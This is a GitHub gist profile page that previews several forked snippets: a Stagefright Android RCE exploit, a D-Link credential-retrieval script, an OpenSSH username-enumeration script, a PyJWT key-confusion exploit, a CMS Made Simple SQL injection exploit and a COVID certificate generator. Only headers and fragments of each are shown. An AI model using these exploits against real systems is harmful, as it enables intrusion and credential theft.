Skip to content

Instantly share code, notes, and snippets.

View s3rgeym's full-sized avatar
🏴‍☠️
Анархия - основа Интернета

[object Object] s3rgeym

🏴‍☠️
Анархия - основа Интернета
View GitHub Profile
@s3rgeym
s3rgeym / badwords.txt
Last active April 17, 2026 13:13 — forked from Bl4ckSh4rk/badwords_3ds.txt
3DS Banned Word List - Updated: 09/13/16 (v9217 | FW 11.1.0-34)
.*(ca|k|ka)ralh(inh|o|ã|õ).*
.*[gj]ilip.*
.*[늬니]미.*
.*[뒈디]져.*
.*[백빽]보지.*
.*[붕븅빙]신.*
.*[뻑뽀]큐.*
.*[시씨]벨넘.*
.*[좃좆]까.*
.*[크클]리토리스.*
@s3rgeym
s3rgeym / covid-certificate-generator.py
Last active April 17, 2026 13:24 — forked from dbolkensteyn/covid-certificate-generator.py
Generates an (invalid) COVID-19 EU certificate
import base45
import cbor2
import zlib
from binascii import unhexlify
from cose.messages import Sign1Message
from cose.keys import CoseKey
# Specifications: https://ec.europa.eu/health/sites/default/files/ehealth/docs/covid-certificate_json_specification_en.pdf
@s3rgeym
s3rgeym / stagefright-exploit
Last active April 17, 2026 13:36 — forked from 4lehandro/stagefright-exploit
Exploit for android
#!/usr/bin/env python
# Joshua J. Drake (@jduck) of ZIMPERIUM zLabs
# Shout outs to our friends at Optiv (formerly Accuvant Labs)
# (C) Joshua J. Drake, ZIMPERIUM Inc, Mobile Threat Protection, 2015
# www.zimperium.com
#
# Exploit for RCE Vulnerability CVE-2015-1538 #1
# Integer Overflow in the libstagefright MP4 'stsc' atom handling
#
# Don't forget, the output of "create_mp4" can be delivered many ways!
@s3rgeym
s3rgeym / dlink_dwr_cred.py
Last active April 17, 2026 13:45 — forked from paralax/dlink_dwr_cred.py
D-Link Router Credential Retrieval
@s3rgeym
s3rgeym / CVE-2018-15473.py
Last active April 17, 2026 14:21 — forked from pdelteil/CVE-2018-15473.py
CVE-2018-15473
#!/usr/bin/env python
###########################################################################
# ____ _____ _____ _ _ #
# / __ \ / ____/ ____| | | | #
# | | | |_ __ ___ _ __ | (___| (___ | |__| | #
# | | | | '_ \ / _ \ '_ \ \___ \\___ \| __ | #
# | |__| | |_) | __/ | | |____) |___) | | | | #
# \____/| .__/ \___|_| |_|_____/_____/|_| |_| #
# | | Username Enumeration #
# |_| #
import requests
import sys
class DupStdout(object):
def __init__(self, log_path):
self.terminal = sys.stdout
self.log_file = open(log_path, "w")
@s3rgeym
s3rgeym / exploit.py
Last active April 17, 2026 14:27 — forked from seifallahhomrani1/exploit.py
CVE-2022-29217 !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! PYJWT RCE
import requests
import jwt
import base64
import json
def extract_pub_key(session_cookie):
return base64.b64decode(json.loads(base64.b64decode((session_cookie.cookies.get_dict()['session'].split('.'))[1] + '=='))['pub'])
ip = "http://127.0.0.1" #change it
@s3rgeym
s3rgeym / cmsmadesimple-exploit.py
Last active April 17, 2026 13:46 — forked from kriss-u/cmsmadesimple-exploit.py
cmsmadesimple <= 2.2.9 SQL injection
#!/usr/bin/python3
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
# Updated by Krishna Upadhyay for Python 3
@s3rgeym
s3rgeym / really-interesting-repos
Last active April 17, 2026 14:02 — forked from jamiedevsandbox/really-interesting-repos
Curated list of impressive repositories
https://github.com/github/training-kit
https://github.com/AdguardTeam/AdGuardHome
https://github.com/TH3xACE/SUDO_KILLER
https://github.com/simbody/simbody
https://github.com/hktalent/scan4all
@s3rgeym
s3rgeym / killabot.py
Last active April 17, 2026 14:18
killabot v1 (wip)
# Requirements: pip install tweepy fuzzywuzzy python-Levenshtein
import tweepy
import re
from fuzzywuzzy import fuzz
# Credentials go here (generate at: https://apps.twitter.com)
auth = tweepy.OAuthHandler('consumer_key', 'consumer_secret')
auth.set_access_token('access_token', 'access_token_secret')
# Connect to Twitter